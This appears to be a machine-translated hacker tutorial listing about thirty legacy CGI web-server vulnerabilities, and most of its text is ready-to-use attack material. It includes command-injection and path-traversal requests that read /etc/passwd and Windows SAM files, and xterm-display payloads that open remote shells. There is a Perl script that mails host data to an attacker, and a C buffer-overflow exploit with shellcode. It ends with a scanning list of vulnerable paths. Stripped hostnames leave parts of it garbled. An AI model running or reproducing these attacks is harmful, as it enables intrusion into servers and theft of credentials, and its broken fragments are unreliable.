1.phf vulnerability
This PHF vulnerability seems to be the most classic. Almost all articles will introduce it. You can execute server commands, such as display
/etc/passwd:
lynx /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
But can we find it?
2. Vulnerabilities in 2.0beta10 or earlier
All files with nobody permission can be read.
lynx /cgi-bin/?/etc/passwd
Version 2.1 can only read the shtml file. For password files, comrades should pay attention, maybe it may be
/etc/
/etc/security/passwd, etc.
3.whois_raw.cgi
lynx /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx /cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter
m%20-display%:0
4.faxsurvey
lynx /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
five.
If there is one on the server, everyone can execute commands with the permissions of the http daemon.
#!/usr/bin/perl
$URL='/a/'; # please _DO_ _modify_ this
$EMAIL='pdoru@,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothe
re_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\
n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #If you don't have the wget command, you can use lynx
#system({"lynx"} "lynx", $text);
VI. Some versions (1.1) info2www vulnerabilities
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd|)'
$
You have new mail.
$
To be honest, I don't quite understand. :(
seven.
lynx -source \
'/cgi-bin/?/../../../../etc/motd'
There is another vulnerability to execute commands
lynx -dump /cgi-bin/?'%0A/bin/uname%20-a|'
or
lynx -dump \
http://victim/cgi-bin/?'%0A/usr/bin/X11/xclock%20-display%20evi
l:0.0|'
8.wrap
lynx /cgi-bin/wrap?/../../../../../etc
9.www-sql
This allows you to read some restricted pages such as:
Enter: /protected/ in your browser:
You are asked to enter your account number and password. If you have www-sql, you don't need to:
/cgi-bin/www-sql/protected/:
10.view-source
lynx /cgi-bin/view-source?../../../../../../../etc/pass
wd
11.campas
lynx /cgi-bin/campas?%0acat%0a/etc/passwd%0a
Twelve.webgais
telnet 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"line
)
query=';mail+drazvan\@
Thirteen.websendmail
telnet 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@=a&content=a
Fourteen.handler
telnet 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display |?data=Download
or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/s
h|?data=Download
Note that after cat, there is a TAB key instead of a space. The server will report that useless_shit cannot be opened, but the following task will still be executed.
make.
15.test-cgi
lynx /cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Get some http directory
lynx /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
This trick doesn't seem to work. :(
lynx /cgi-bin/nph-test-cgi?/*
You can try this
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
Sixteen. For some BSD apaches, you can:
lynx /root/etc/passwd
lynx /~root/etc/passwd
Seventeen.htmlscript
lynx /cgi-bin/htmlscript?../../../../etc/passwd
eighteen.
The demo cgi program calls /bin/mail without filtering user
input, so any program based on could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program running strings on it
will probably reveil the password.
Do a web search on to get a copy and study the code yourself if
you have more questions.
19.Frontpage extensions
If you read /_vti_inf.html you will get the FP extensions version
And its path on the server. There are also some password files such as:
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
Twenty. CGI
I haven't encountered it before, and I feel that some things can't be mistaken, so I just posted them in English.
John Carlton found following. He developed an exploit for the
free web stats services offered at , and supplied the
webmaster with proper code to patch the bug.
Start an account with , and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. Their will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple javascript function.
Deep inside the web site authors still have the good old ""
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
/cgi-bin/?account=&password=
Twenty-one.Vulnerability in Glimpse HTTP
telnet 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@\MD;echo
HTTP/1.0
Twenty-two.
This program is only valid for versions below 24:
/*### ########################################################*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;
offset = sp = cnt = ver = 0;
fprintf(stderr,"\t%s - Gus\n",argv[0]);
if (argc<3) usage(argv[0]);
while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
switch(cnt){
case 'h':
host = optarg;
break;
case 'd':
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case 'v':
ver = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
sp = offset + getsp(ver);
(void)doit(host,sp,shellcode);
exit(0);
}
unsigned long getsp(int ver) {
/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;
if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don't have an sp for that version try using the -o option.
\n");
fprintf(stderr,"Versions above 24 are patched for this bug.\n");
exit(1);
} else {
return sp;
}
}
int usage (char *name) {
fprintf(stderr,"\tUsage:%s -h host -d -v [-o ]\n
",name);
fprintf(stderr,"\. %s -h -d 127.0.0.1:0 -v 22\n",name);
exit(1);
}
int openhost (char *host, int port) {
int sock;
struct hostent *he;
struct sockaddr_in sa;
he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname\n");
exit(-1);
}
memcpy(&sa.sin_addr, he->h_addr, he->h_length);
sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));
if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}
return(sock);
}
void doit (char *host,long sp, char *shellcode) {
int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";
bzero(buf);
for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;
qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;
qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,"GET /cgi-bin/?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0\n",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"\n\n",2);
sleep(1);
/* printf("GET /cgi-bin/?%s HTTP/1.0\nUser-Agent: %s\n\n",qs,qs); *
/
/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./");
*/
}
See pictures
/cgi-bin/?display=image&image=../../../../.
./../path_to_gif/
Twenty-three.
lynx /cgi-bin/finger?@localhost
Get the username logged in on the host.
Twenty-four.
Robert Moniot found followung. The May 1998 issue of SysAdmin
Magazine contains an article, "Web-Enabled Man Pages", which
includes source code for very nice cgi script named to feed
man pages to a web browser. The hypertext links to other man
pages are an especially attractive feature.
Unfortunately, this script is vulnerable to attack. Essentially,
anyone who can execute the cgi thru their web browser can run any
system commands with the user id of the web server and obtain the
output from them in a web page.
Twenty-five.
Add in the table
Your email address contains /etc/passwd
Twenty-six.JFS
I believe everyone has seen the article "The detailed process of JFS intruding into PCWEEK-LINUX host", and he uses photosads
This CGI module hits the host. I have never actually attacked it, so what I understand when reading the article
lynx first "/photoads/cgi-bin/?AdNum=31
337&action=done&Country=lala&City=lele&State=a&EMail=lala@&Name=%0a
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111 1111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111 111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111 1111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111 111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111 11111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111 111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111 11111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111 111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111 111111111111111111111111111&Phone=1
1&Subject=la&password=0&CityStPhone=0&Renewed=0"
Create a new AD value and bypass the check of $AdNum
lynx '/photoads/cgi-bin/?file=
g&AdNum=11111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111 111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111 11111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111 111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111 11111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111 1111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111 11111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111 1111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111 1111111111111111111111111111111111111111111111&DataFile=1&Password=0&FIL
E_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/\../../../
../../../../home/httpd/html/photoads/cgi-bin/%'
Create/overwrite any file that the user nobody has permission to write.
I don’t know if my understanding is correct. I can’t find the to_url script in its zip package. I wonder which comrade knows?
Twenty-seven.backdoor
I see that some check *s are unlg1.1 and
The previous one was written by UnlG, I have never seen the source code, there is one written by THC, and the packetstorm has its 1.6 source code.
Twenty-eight.
/cgi-bin/?user=guest
This command line will keep writing things to the server's hard disk until it is full.
Twenty-nine.campas
> telnet 80
Trying ...
Connected to
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
..... You know what to do next :P
Thirty.webgais
query=';mail+foo@ 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan\@
telnet 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@=a
&content=a
Thirty-one.wrap
/cgi-bin/wrap?/../../../../../etc
List files in etc directory
Below are all the CGI program names that may contain vulnerabilities. As for other vulnerabilities, they are being collected and sorted out.
My heart hopes will get your criticism and advice.
/cgi-bin/
/cgi-bin/phf
/cgi-bin/
/cgi-bin/
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/
/cgi-bin/faxsurvey
/cgi-bin/htmlscript /cgi-bin/
/cgi-bin/
/cgi-bin/
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/
/cgi-bin/
/scripts/
/_vti_bin/
/_vti_inf.html
/_vti_pvt/
/_vti_pvt/
/msadc/Samples/SELECTOR/
/scripts/iisadmin/?http/dir
/adsamples/config/
/%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/?|dir..\..\windows
/::$DATA
/cgi-bin/?user=guest
/?PageServices
/
/cgi-bin/|echo%20>c:\
/cgi-bin/
/cgi-bin/?/../../../../etc/motd
/ /
/
/
/
/
/cgi-bin/
/secure/.wwwacl
/secure/.htaccess
/samples/search/
/scripts/srchadm/
/cgi-bin/
adminlogin?RCpage=/sysadmin/ /c:/program
/
/test/
/scripts/
/users/scripts/
/ncl_items.html?SUBJECT=2097 /cgi-bin/ /cgi-bin/ /cgi
-bin/jj
/cgi-bin/info2www
/cgi-bin/
/cgi-bin/finger
/cgi-bin/
/cgi-bin/
/cgi-bin/AnyForm2
/cgi-bin/
/cgi-bin/
/cgi-bin/
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/
/cgi-bin/
/cgi-bin/
/_vti_inf.html
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
/cgi-win/
/../../
/iisadmpwd/
/iisadmpwd/
/iisadmpwd/
/iisadmpwd/
/iisadmpwd/
cfdocs/expeval/?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/
/cfdocs/expeval/
/?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/
/cgi-bin/
/_vti_pvt/
/_vti_pvt/
/cgi-dos/
/cgi-win/
/cgi-bin/
/cgi-bin/
/scripts/issadmin/
/scripts/
/scripts/tools/
/scripts/
/cfdocs/expelval/
/cfdocs/expelval/
/cfdocs/expelval/
/cfdocs/expelval/
/iissamples/exair/howitworks/
/iissamples/sdk/asp/docs/
/msads/Samples/SELECTOR/
/
/
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./
/....../